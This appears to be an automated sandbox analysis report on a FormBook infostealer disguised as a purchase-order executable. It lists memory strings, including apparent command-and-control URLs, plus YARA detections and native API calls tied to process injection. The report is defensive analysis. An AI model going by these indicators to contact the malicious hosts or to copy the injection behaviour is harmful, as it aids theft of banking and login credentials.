Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/downloads/
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/hits/hit_index.php?k=
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/index_ru.html
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/index_ru.htmlc
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: http://servermanager.miixit.org/report/reporter_index.php?name=
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000002.589360759.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmp	String found in binary or memory: http://www.patricksparber.com/
Source: raserver.exe, 00000009.00000002.589924154.0000000002F3C000.00000004.00000020.sdmp	String found in binary or memory: http://www.patricksparber.com/K
Source: raserver.exe, 00000009.00000002.589940302.0000000002F43000.00000004.00000020.sdmp	String found in binary or memory: http://www.patricksparber.com/meub/?5jYHTPD=q/3go0TMrjOOicJ8yyeZoSSUK4YYViZWgar0VOI0LAyS1IHPJrhhqQPM
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.371695553.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO 367628usa.exe, 00000000.00000002.346118335.00000000029F3000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
Source: PO 367628usa.exe, 00000000.00000002.345992279.00000000029A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana

Source: PO 367628usa.exe, 00000000.00000002.345192885.0000000000B2B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.588488580.0000000000910000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.589496878.0000000002E40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.589661592.0000000002E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.347022763.00000000039F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.389944333.0000000001440000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.390287791.0000000001860000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.388446461.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.PO 367628usa.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.PO 367628usa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

PE file contains section with special chars

Show sources

Source: PO 367628usa.exe

Static PE information: section name: ^8+S|rz

PE file has nameless sections

Show sources

Source: PO 367628usa.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_004181C0 NtCreateFile,	5_2_004181C0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00418270 NtReadFile,	5_2_00418270
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_004182F0 NtClose,	5_2_004182F0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_004183A0 NtAllocateVirtualMemory,	5_2_004183A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_004181BC NtCreateFile,	5_2_004181BC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041826A NtReadFile,	5_2_0041826A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_004182EC NtClose,	5_2_004182EC
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041839B NtAllocateVirtualMemory,	5_2_0041839B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019099A0 NtCreateSection,LdrInitializeThunk,	5_2_019099A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01909910
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_019098F0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909840 NtDelayExecution,LdrInitializeThunk,	5_2_01909840
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01909860
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01909A00
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909A20 NtResumeThread,LdrInitializeThunk,	5_2_01909A20
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909A50 NtCreateFile,LdrInitializeThunk,	5_2_01909A50
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019095D0 NtClose,LdrInitializeThunk,	5_2_019095D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909540 NtReadFile,LdrInitializeThunk,	5_2_01909540
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909780 NtMapViewOfSection,LdrInitializeThunk,	5_2_01909780
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_019097A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909FE0 NtCreateMutant,LdrInitializeThunk,	5_2_01909FE0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909710 NtQueryInformationToken,LdrInitializeThunk,	5_2_01909710
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_019096E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01909660
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019099D0 NtCreateProcessEx,	5_2_019099D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909950 NtQueueApcThread,	5_2_01909950
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019098A0 NtWriteVirtualMemory,	5_2_019098A0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909820 NtEnumerateKey,	5_2_01909820
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190B040 NtSuspendThread,	5_2_0190B040
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190A3B0 NtGetContextThread,	5_2_0190A3B0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909B00 NtSetValueKey,	5_2_01909B00
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909A80 NtOpenDirectoryObject,	5_2_01909A80
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909A10 NtQuerySection,	5_2_01909A10
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019095F0 NtQueryInformationFile,	5_2_019095F0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190AD30 NtSetContextThread,	5_2_0190AD30
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909520 NtWaitForSingleObject,	5_2_01909520
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909560 NtWriteFile,	5_2_01909560
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190A710 NtOpenProcessToken,	5_2_0190A710
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909730 NtQueryVirtualMemory,	5_2_01909730
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0190A770 NtOpenThread,	5_2_0190A770
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909770 NtSetInformationFile,	5_2_01909770
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909760 NtOpenProcess,	5_2_01909760
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_019096D0 NtCreateKey,	5_2_019096D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909610 NtEnumerateValueKey,	5_2_01909610
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909650 NtQueryValueKey,	5_2_01909650
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_01909670 NtQueryInformationProcess,	5_2_01909670
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C195D0 NtClose,LdrInitializeThunk,	9_2_04C195D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19540 NtReadFile,LdrInitializeThunk,	9_2_04C19540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C196D0 NtCreateKey,LdrInitializeThunk,	9_2_04C196D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C196E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_04C196E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19650 NtQueryValueKey,LdrInitializeThunk,	9_2_04C19650
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04C19660
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04C19FE0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04C19780
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04C19710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19840 NtDelayExecution,LdrInitializeThunk,	9_2_04C19840
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04C19860
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C199A0 NtCreateSection,LdrInitializeThunk,	9_2_04C199A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04C19910
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19A50 NtCreateFile,LdrInitializeThunk,	9_2_04C19A50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C195F0 NtQueryInformationFile,	9_2_04C195F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19560 NtWriteFile,	9_2_04C19560
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19520 NtWaitForSingleObject,	9_2_04C19520
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C1AD30 NtSetContextThread,	9_2_04C1AD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19670 NtQueryInformationProcess,	9_2_04C19670
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19610 NtEnumerateValueKey,	9_2_04C19610
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C197A0 NtUnmapViewOfSection,	9_2_04C197A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19760 NtOpenProcess,	9_2_04C19760
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C1A770 NtOpenThread,	9_2_04C1A770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19770 NtSetInformationFile,	9_2_04C19770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C1A710 NtOpenProcessToken,	9_2_04C1A710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19730 NtQueryVirtualMemory,	9_2_04C19730
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C198F0 NtReadVirtualMemory,	9_2_04C198F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C198A0 NtWriteVirtualMemory,	9_2_04C198A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C1B040 NtSuspendThread,	9_2_04C1B040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19820 NtEnumerateKey,	9_2_04C19820
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C199D0 NtCreateProcessEx,	9_2_04C199D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19950 NtQueueApcThread,	9_2_04C19950
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19A80 NtOpenDirectoryObject,	9_2_04C19A80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19A00 NtProtectVirtualMemory,	9_2_04C19A00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19A10 NtQuerySection,	9_2_04C19A10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19A20 NtResumeThread,	9_2_04C19A20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C1A3B0 NtGetContextThread,	9_2_04C1A3B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04C19B00 NtSetValueKey,	9_2_04C19B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_009281C0 NtCreateFile,	9_2_009281C0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_009282F0 NtClose,	9_2_009282F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00928270 NtReadFile,	9_2_00928270
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_009283A0 NtAllocateVirtualMemory,	9_2_009283A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_009281BC NtCreateFile,	9_2_009281BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_009282EC NtClose,	9_2_009282EC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092826A NtReadFile,	9_2_0092826A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_0092839B NtAllocateVirtualMemory,	9_2_0092839B

Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD2DB0	0_2_00DD2DB0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD2520	0_2_00DD2520
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD4620	0_2_00DD4620
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD37E0	0_2_00DD37E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DDB7E0	0_2_00DDB7E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD60D0	0_2_00DD60D0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD54C0	0_2_00DD54C0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD60E0	0_2_00DD60E0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD2499	0_2_00DD2499
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DDA888	0_2_00DDA888
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6C08	0_2_00DD6C08
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6DC1	0_2_00DD6DC1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DDB1F8	0_2_00DDB1F8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6999	0_2_00DD6999
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD45B7	0_2_00DD45B7
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD69A8	0_2_00DD69A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD455B	0_2_00DD455B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD1908	0_2_00DD1908
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD3249	0_2_00DD3249
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DDA218	0_2_00DDA218
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6BF8	0_2_00DD6BF8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6758	0_2_00DD6758
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_00DD6748	0_2_00DD6748
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E6508	0_2_054E6508
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E3C48	0_2_054E3C48
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E5C00	0_2_054E5C00
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E07B8	0_2_054E07B8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E5E24	0_2_054E5E24
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E8620	0_2_054E8620
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E0040	0_2_054E0040
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E58D3	0_2_054E58D3
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EA3E3	0_2_054EA3E3
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E9208	0_2_054E9208
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E9A30	0_2_054E9A30
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ECD48	0_2_054ECD48
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ECD58	0_2_054ECD58
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED5D9	0_2_054ED5D9
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED5E8	0_2_054ED5E8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E64FB	0_2_054E64FB
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EB731	0_2_054EB731
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EC1C0	0_2_054EC1C0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E9183	0_2_054E9183
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EC1B0	0_2_054EC1B0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED048	0_2_054ED048
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED851	0_2_054ED851
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED860	0_2_054ED860
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054E5BF0	0_2_054E5BF0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED3A1	0_2_054ED3A1
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054ED3B0	0_2_054ED3B0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_054EDA68	0_2_054EDA68
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C6B648	0_2_05C6B648
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C6459B	0_2_05C6459B
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C68DAE	0_2_05C68DAE
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C645A8	0_2_05C645A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C64553	0_2_05C64553
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C63168	0_2_05C63168
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C68D31	0_2_05C68D31
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C630F0	0_2_05C630F0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C64099	0_2_05C64099
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C640A8	0_2_05C640A8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C60040	0_2_05C60040
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C60007	0_2_05C60007
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C66B80	0_2_05C66B80
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C66B90	0_2_05C66B90
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C637B0	0_2_05C637B0
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C68B50	0_2_05C68B50
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C68758	0_2_05C68758
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C64ED8	0_2_05C64ED8
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 0_2_05C64E78	0_2_05C64E78
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00401027	5_2_00401027
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041C82E	5_2_0041C82E
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041A2A6	5_2_0041A2A6
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041BABD	5_2_0041BABD
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00408C1A	5_2_00408C1A
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_0041B504	5_2_0041B504
Source: C:\Users\user\Desktop\PO 367628usa.exe	Code function: 5_2_00402D90	5_2_00402D90
